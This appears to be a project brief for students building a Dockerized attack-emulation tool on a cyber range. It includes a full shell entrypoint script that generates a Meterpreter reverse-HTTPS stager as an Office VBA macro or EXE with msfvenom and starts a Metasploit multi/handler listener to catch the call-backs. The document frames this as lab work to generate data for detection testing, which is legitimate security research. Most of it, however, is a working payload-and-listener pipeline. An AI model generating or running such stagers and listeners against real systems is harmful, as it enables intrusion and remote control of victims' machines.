Background
Please read the following. Skip anything you have already read or watched:
Outcomes
- Understand the motivation behind attack-test automation on a cyber range
- Reuse past students' work (Wen Siang's Attack-Automation) and extend it to further attack emulations
- Learn how to package the work so that it is user-friendly for your "users" (like what I did with the OEDR backend, which used to be a pain in the ass to deploy). Use a Docker container so that the data-analytics team can easily deploy it and run automated attacks to generate data for their test cases (I will handle the target VMs within SandPIT, our cyber range).
Dockerized AutoTTP Deliverables
1. Payload generation
- Environment variables must be passed to the container at start-up so that it knows the host IP address (and port) the payload should call back to
- Preferably Type 2 scripting (the spoofing Office macro is good; extend it so that it calls back to a Meterpreter HTTPS listener). If that really cannot be made to work, fall back to an EXE, in which case we have to run detectOnly on the target-victim host.
2. C2 Listener Configuration
3. Automated Scripting
- You will need volume mapping, much like how OpenEDR does it
- The entrypoint script in the container will use the environment variable(s) to:
- generate the payload and write it to the volume-mapped folder
- start the C2 listener and wait for payload call-backs
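As an added worked example of the three deliverables above (not code from the project or from Wen Siang's Attack-Automation), the entrypoint script below shows the whole flow: read `LHOST`/`LPORT`/`PAYLOAD_TYPE`/`OUTPUT_DIR` from the container environment, validate them, build the `msfvenom` command for a `windows/meterpreter/reverse_https` stager written to the mapped `/output` volume, write a resource script for `exploit/multi/handler`, and start the listener. The variable names, the `run` command convention for the Docker `CMD`, the `payload.vba`/`payload.exe` file names and the `/output` mount point are assumptions made for this example; the `msfvenom`/`msfconsole` flags and handler options are standard Metasploit ones.

```shell
#!/bin/sh
# entrypoint.sh for the AutoTTP container (added example, not the project's code).
#
# Assumed contract (hypothetical, chosen for this example):
#   Dockerfile:  ENTRYPOINT ["/entrypoint.sh"]   CMD ["run"]
#   docker run --rm -e LHOST=203.0.113.5 -e LPORT=8443 -e PAYLOAD_TYPE=macro \
#              -p 8443:8443 -v "$PWD/out:/output" autottp
#   LHOST/LPORT  : Docker *host* address/port the victim VM can reach (payload call-back target)
#   PAYLOAD_TYPE : macro (Type 2 script, default) or exe (fallback; needs detectOnly on the victim)
#   OUTPUT_DIR   : volume-mapped folder the payload is written to, default /output
set -eu

OUTPUT_DIR="${OUTPUT_DIR:-/output}"
PAYLOAD_TYPE="${PAYLOAD_TYPE:-macro}"
MSF_PAYLOAD="windows/meterpreter/reverse_https"

# Abort with a clear message instead of generating a payload that calls back to nowhere.
require_env() {
    eval "val=\${$1:-}"
    [ -n "$val" ] || { echo "entrypoint: $1 must be set (-e $1=...)" >&2; return 1; }
}

# Dotted-quad check: four fields, each 0-255. Rejects a host name or a garbled IP early.
validate_ipv4() {
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for octet in $(echo "$1" | tr '.' ' '); do
        [ "$octet" -le 255 ] || return 1
    done
}

# Port must be numeric and in range; the listener later binds to the same value.
validate_port() {
    echo "$1" | grep -Eq '^[0-9]{1,5}$' && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Map PAYLOAD_TYPE to "<msfvenom format> <output file name>".
payload_format() {
    case "$1" in
        macro) echo "vba payload.vba" ;;
        exe)   echo "exe payload.exe" ;;
        *) echo "entrypoint: unknown PAYLOAD_TYPE '$1' (expected macro|exe)" >&2; return 1 ;;
    esac
}

# Build (but do not run) the generation command so it can be logged and unit-tested.
build_venom_cmd() {
    fmt=$(payload_format "$PAYLOAD_TYPE") || return 1
    set -- $fmt
    echo "msfvenom -p $MSF_PAYLOAD LHOST=$LHOST LPORT=$LPORT -f $1 -o $OUTPUT_DIR/$2"
}

# Handler resource script. LHOST stays the host IP the stager was built with, but the socket
# must bind inside the container, hence ReverseListenerBindAddress 0.0.0.0 (binding to the
# host IP would fail because it is not on the container's interface). ExitOnSession false
# keeps the listener up across repeated automated runs.
write_handler_rc() {
    mkdir -p "$OUTPUT_DIR"
    rc="$OUTPUT_DIR/handler.rc"
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $MSF_PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ReverseListenerBindAddress 0.0.0.0
set ExitOnSession false
exploit -z
EOF
    echo "$rc"
}

main() {
    require_env LHOST
    require_env LPORT
    validate_ipv4 "$LHOST" || { echo "entrypoint: LHOST '$LHOST' is not an IPv4 address" >&2; return 1; }
    validate_port "$LPORT" || { echo "entrypoint: LPORT '$LPORT' is out of range" >&2; return 1; }
    mkdir -p "$OUTPUT_DIR"
    cmd=$(build_venom_cmd)
    echo "[+] generating payload: $cmd"
    $cmd
    rc=$(write_handler_rc)
    echo "[+] starting C2 listener on 0.0.0.0:$LPORT (payload calls back to $LHOST:$LPORT)"
    exec msfconsole -q -r "$rc"
}

# Act as the entrypoint only when invoked with the "run" command (the Docker CMD above).
case "${1:-}" in
    run) main ;;
esac
```

Two things the data-analytics team will trip over if they are not spelled out in the README: `LHOST` must be the address of the Docker host as seen from the victim VM in SandPIT (never the container's own 172.17.x.x address), and the `-p` port mapping must match `LPORT`, otherwise the macro runs on the victim but the call-back never arrives. The generated `payload.vba` on the shared volume is a real reverse-shell stager, so endpoint protection on whatever machine mounts `out/` will flag it; that folder should be excluded or the file moved straight onto the target VM.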